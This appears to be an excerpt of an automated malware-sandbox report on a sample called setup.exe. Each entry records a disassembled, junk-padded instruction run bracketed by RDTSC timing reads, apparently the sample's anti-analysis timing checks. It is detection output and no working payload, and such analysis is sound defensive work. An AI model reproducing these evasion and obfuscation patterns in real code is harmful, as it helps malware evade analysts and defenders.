Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C00D1 second address: 48C00E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C00E0 second address: 48C00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C00E6 second address: 48C00EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C038C second address: 48C03CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FBA2516CD4Bh 0x0000000b jmp 00007FBA2516CD53h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA2516CD55h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0666 second address: 48E066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E066C second address: 48E0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0670 second address: 48E0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0674 second address: 48E06F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA2516CD4Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBA2516CD4Eh 0x00000016 adc si, B478h 0x0000001b jmp 00007FBA2516CD4Bh 0x00000020 popfd 0x00000021 jmp 00007FBA2516CD58h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FBA2516CD50h 0x0000002e xchg eax, ecx 0x0000002f pushad 0x00000030 pushad 0x00000031 mov edi, eax 0x00000033 mov cx, 9C7Fh 0x00000037 popad 0x00000038 mov cl, 81h 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FBA2516CD4Dh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E06F5 second address: 48E075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBA24820DA7h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FBA24820DA9h 0x0000000f sbb ecx, 716CB136h 0x00000015 jmp 00007FBA24820DA1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ecx 0x0000001f jmp 00007FBA24820D9Eh 0x00000024 mov eax, dword ptr [76FA65FCh] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E075F second address: 48E0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0763 second address: 48E0769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0769 second address: 48E0778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0778 second address: 48E077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E077C second address: 48E07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e mov ah, bl 0x00000010 popad 0x00000011 je 00007FBA977AFF1Fh 0x00000017 jmp 00007FBA2516CD56h 0x0000001c mov ecx, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FBA2516CD4Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E07B9 second address: 48E07BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E07BF second address: 48E07DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E07DD second address: 48E07E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E07E3 second address: 48E07E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E07E7 second address: 48E082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FBA24820DA2h 0x00000012 mov eax, 240E40A1h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FBA24820D9Ch 0x00000020 or ecx, 33D9AC38h 0x00000026 jmp 00007FBA24820D9Bh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E082D second address: 48E0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ror eax, cl 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0846 second address: 48E084A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E084A second address: 48E0850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0850 second address: 48E0891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FBA24820DA0h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [007C2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FBA2898161Ch 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBA24820DA7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0891 second address: 48E08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov bh, 4Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD4Ah 0x00000010 ret 0x00000011 nop 0x00000012 push eax 0x00000013 call 00007FBA292CD5F6h 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E08AE second address: 48E08C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBA24820DA3h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E08C7 second address: 48E08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bl, ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E08D7 second address: 48E0924 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 mov edx, esi 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FBA24820DA4h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FBA24820DA0h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBA24820DA7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0924 second address: 48E092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890008 second address: 489000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489000C second address: 4890010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890010 second address: 4890016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890016 second address: 489008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 jmp 00007FBA2516CD55h 0x00000017 popfd 0x00000018 mov ah, 0Ah 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FBA2516CD53h 0x00000023 adc ax, 832Eh 0x00000028 jmp 00007FBA2516CD59h 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489008C second address: 489009D instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov ch, 5Fh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489009D second address: 48900A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48900A5 second address: 48900BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA24820D9Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48900BD second address: 48900D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA2516CD51h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48900D3 second address: 48900E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48900E2 second address: 4890176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 and esp, FFFFFFF8h 0x00000009 jmp 00007FBA2516CD4Eh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FBA2516CD50h 0x00000014 push eax 0x00000015 pushad 0x00000016 mov dx, D074h 0x0000001a pushad 0x0000001b mov al, bl 0x0000001d pushfd 0x0000001e jmp 00007FBA2516CD54h 0x00000023 add esi, 1A158228h 0x00000029 jmp 00007FBA2516CD4Bh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ecx 0x00000032 jmp 00007FBA2516CD56h 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FBA2516CD50h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FBA2516CD4Dh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890176 second address: 489017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489017A second address: 4890180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890180 second address: 4890264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBA24820D9Eh 0x00000011 adc eax, 561EA948h 0x00000017 jmp 00007FBA24820D9Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FBA24820DA6h 0x00000024 xor ecx, 31C86BA8h 0x0000002a jmp 00007FBA24820D9Bh 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+10h] 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FBA24820DA2h 0x0000003e add ch, 00000008h 0x00000041 jmp 00007FBA24820D9Bh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FBA24820DA8h 0x0000004d sub cl, 00000068h 0x00000050 jmp 00007FBA24820D9Bh 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 pushad 0x0000005a mov bx, si 0x0000005d push eax 0x0000005e pop edi 0x0000005f popad 0x00000060 mov ebx, ecx 0x00000062 popad 0x00000063 push eax 0x00000064 jmp 00007FBA24820D9Fh 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FBA24820DA5h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890264 second address: 4890298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBA2516CD50h 0x00000017 xor cx, 8788h 0x0000001c jmp 00007FBA2516CD4Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890298 second address: 489029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489029E second address: 48902A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48902A2 second address: 48902A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48902A6 second address: 48902CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA2516CD58h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48902CD second address: 489037A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBA24820DA3h 0x00000008 or si, E9DEh 0x0000000d jmp 00007FBA24820DA9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov edx, eax 0x0000001d pushad 0x0000001e mov ax, E931h 0x00000022 jmp 00007FBA24820D9Eh 0x00000027 popad 0x00000028 popad 0x00000029 je 00007FBA96EAF08Ah 0x0000002f pushad 0x00000030 mov dx, ax 0x00000033 pushfd 0x00000034 jmp 00007FBA24820D9Ah 0x00000039 add esi, 4494EC38h 0x0000003f jmp 00007FBA24820D9Bh 0x00000044 popfd 0x00000045 popad 0x00000046 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004d jmp 00007FBA24820DA6h 0x00000052 je 00007FBA96EAF05Bh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FBA24820D9Ah 0x00000061 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489037A second address: 489037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 489037E second address: 4890384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890384 second address: 48903FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBA2516CD4Dh 0x00000013 sbb eax, 08BF9EE6h 0x00000019 jmp 00007FBA2516CD51h 0x0000001e popfd 0x0000001f popad 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 mov bx, si 0x00000027 pushfd 0x00000028 jmp 00007FBA2516CD58h 0x0000002d adc eax, 5C58F5B8h 0x00000033 jmp 00007FBA2516CD4Bh 0x00000038 popfd 0x00000039 popad 0x0000003a test edx, 61000000h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov edi, ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48903FF second address: 4890438 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 358F5A3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a movsx edi, ax 0x0000000d pop ecx 0x0000000e popad 0x0000000f jne 00007FBA96EAF010h 0x00000015 jmp 00007FBA24820DA1h 0x0000001a test byte ptr [esi+48h], 00000001h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBA24820D9Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890438 second address: 489047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBA977FAF9Ah 0x0000000f jmp 00007FBA2516CD4Eh 0x00000014 test bl, 00000007h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBA2516CD57h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48807C8 second address: 4880822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FBA24820D9Ch 0x00000011 mov cx, 76A1h 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 jmp 00007FBA24820D9Ch 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBA24820DA7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880822 second address: 488083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 488083A second address: 48808F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 2B3F316Ah 0x00000012 mov cx, di 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 jmp 00007FBA24820DA3h 0x0000001d mov si, DF1Fh 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FBA24820DA2h 0x00000028 push eax 0x00000029 pushad 0x0000002a mov bx, 0534h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FBA24820DA3h 0x00000035 adc esi, 490C84CEh 0x0000003b jmp 00007FBA24820DA9h 0x00000040 popfd 0x00000041 call 00007FBA24820DA0h 0x00000046 pop eax 0x00000047 popad 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a jmp 00007FBA24820DA1h 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movsx edx, cx 0x00000058 mov cx, 5BCBh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48808F1 second address: 48808F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48808F7 second address: 48808FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48808FB second address: 488090C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 488090C second address: 4880961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FBA24820D9Ch 0x0000000b or ecx, 6EC99208h 0x00000011 jmp 00007FBA24820D9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov bx, si 0x0000001e movzx esi, bx 0x00000021 popad 0x00000022 je 00007FBA96EB67E9h 0x00000028 jmp 00007FBA24820DA3h 0x0000002d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880961 second address: 488097C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 488097C second address: 48809AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov dl, ch 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 je 00007FBA96EB6797h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809AE second address: 48809B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809B2 second address: 48809B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809B6 second address: 48809BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809BC second address: 48809C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809C2 second address: 48809C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809C6 second address: 48809CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809CA second address: 48809F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBA2516CD59h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48809F4 second address: 4880A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBA96EB6743h 0x0000000f jmp 00007FBA24820D9Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007FBA24820DA0h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBA24820DA7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880A4A second address: 4880A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FBA2516CD58h 0x00000011 popad 0x00000012 rdtsc
